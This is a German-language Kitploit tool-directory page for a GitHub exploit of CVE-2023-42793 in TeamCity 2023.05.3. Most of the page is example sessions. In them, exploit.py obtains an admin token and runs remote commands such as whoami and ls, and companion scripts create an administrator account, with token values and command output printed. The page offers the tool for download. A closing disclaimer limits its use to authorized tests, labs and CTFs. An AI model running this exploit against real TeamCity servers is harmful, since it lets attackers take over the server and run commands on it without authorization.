Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-42793 — TeamCity 2023.05.3 - CVE-2023-42793 - Benutzernamen administrator erstellen. | Kitploit
Tools/GitHubGitHub/cxdxnt/cve-2023-42793
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubcxdxnt/cve-2023-42793

CVE-2023-42793

TeamCity 2023.05.3 - CVE-2023-42793 - Benutzernamen administrator erstellen.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-42793 - Administrator-Benutzernamen erstellen

Beispiel für die Befehlsausführung:

root@kitploit:~
python3 exploit.py -u http://localhost
User add token ->  eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15  2020 .
drwxr-xr-x 1 root root 4096 Feb 28  2024 ..

StdErr: 
Exit code: 0
Time: 23ms

Falls das Token abläuft, wird automatisch ein neues erstellt.

root@kitploit:~
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token ->  eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 24ms

Administrator-Benutzernamen erstellen:

root@kitploit:~
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator

Falls bereits ein Benutzer existiert:

root@kitploit:~
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.

Rechtshinweis

Dieses Repository dient ausschließlich Bildungs- und Forschungszwecken im Bereich Computersicherheit. Die Verwendung der hier beschriebenen Skripte und Techniken, um Systeme ohne Autorisierung zu kompromittieren, ist illegal und verstößt gegen nationale und internationale Gesetze, wie etwa das Gesetz 26.388 (Argentinien), den CFAA (USA) und die Budapest-Konvention.

Der Autor ist nicht für den Missbrauch der hier bereitgestellten Informationen verantwortlich. Die Nutzung dieses Materials ist nur in kontrollierten Umgebungen, Laboren, CTFs oder mit ausdrücklicher Genehmigung des Systemeigentümers gestattet.

Wenn Sie Tests durchführen möchten, stellen Sie sicher, dass Sie die Erlaubnis haben. Hacking ohne Autorisierung ist kein ethisches Hacking; es ist ein Verbrechen.

Tool herunterladen